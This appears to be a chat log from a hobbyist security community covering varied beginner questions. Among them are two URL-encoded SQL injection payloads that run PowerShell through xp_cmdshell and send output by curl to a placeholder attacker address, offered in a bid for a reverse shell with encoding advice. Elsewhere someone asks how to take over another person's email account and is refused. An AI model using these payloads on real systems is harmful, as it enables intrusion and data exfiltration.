for URL in $(<urls.txt); do ( fuff -u "${URL}/FUZZ" -w wordlist -ac ); done
lol sry
alr ill try it out
need help with understanding a dns map
i've got a specific example, can you take a look?
I've never used it but lemme take a look
ok ill dm you
ok
i just got a flipper zero and dont know where to start can someone help also when i insert the microSD card it wont fully go in it i have to hold it down
lost my disocrd account
pls fucking help me theres chrome extension highjakcere cant delete tried deletnig it regedit wont work, rank my shit in safe mode won't work either what do i do
Hey, I need some help with a reverse shell. I'm able to execute commands using xp_cmdshell, and I can succesfully retrieve command results via an OOB method: '%3b%20EXEC%20master.dbo.xp_cmdshell%20'for%20%2ff%20%25i%20in%20(''powershell.exe%20whoami'')%20do%20curl%20http%3a%2f%2fMY_IP%2f%3fid%3d%25i%3b--%20
But writing to a file, or downloading anything doesnt work, ex: '%3b%20EXEC%20master.dbo.xp_cmdshell%20'for%20%2ff%20%25i%20in%20(''powershell.exe%20echo%201337%20>%20C:\\Windows\\Temp\\foo.txt'')%20do%20curl%20http%3a%2f%2fMY_IP%2f%3fid%3d%25i%3b--%20
try encoding the payload in b64. url encoding doesn't always work well with escape sequences
hey guys i have a question
what would be a good study plan to have the sufficient level to do the red teaming certificate from thm?
DM me
Networking Basics
Fundamental Concepts
Security Tools
Security Policies
The Networking Basics I already have knowledge of because of my Internship at the university of Utrecht in the Netherlands as Junior NetworkAdminstrator
What do you mean by Fundamental Concept? @plucky patio
I wanna learn how to make cashapp money
hello ppl somebody please put me on email hacking game i mean for educational purposes only
what do you mean?
Start an OF
lol
Wdym g
i want to get my targets password or change it without their notice
Yeah well this ain't the place you wanna ask that cuz these peeps won't help ya
theHarvester , can you help me about theHarvester how to use it and please can you explain it guys
thanks what im lookings for is recommandations not assitsance in that manner ill do futher research on that
Hey, that’s still not something that we help out with here - Please don’t ask how to do unethical things
Random question: I unzipped a zip file (yep, has .zip) and for a second I saw a folder named ".AU.uj4jU.nosync" appear and then disappear which was not a file I expected to appear when unzipping the file. Should I be panicking or no? If so, what should I do?
Context: saved the file in google drive
FAQ: are my file extensions on? yes, so it's not a fake zip file
alright tysm! im currently scanning it in virus total rn (it's a big file, supposed to contain lots of images and 2 csv files)
your explanation is really clear :D
No security vendors flagged this file as malicious
Should I wait for the sandboxes or no? (sandbox option doesn't show up)
do you have any other antiviruses that you would suggest I check?
alright I'll check those out too tysm!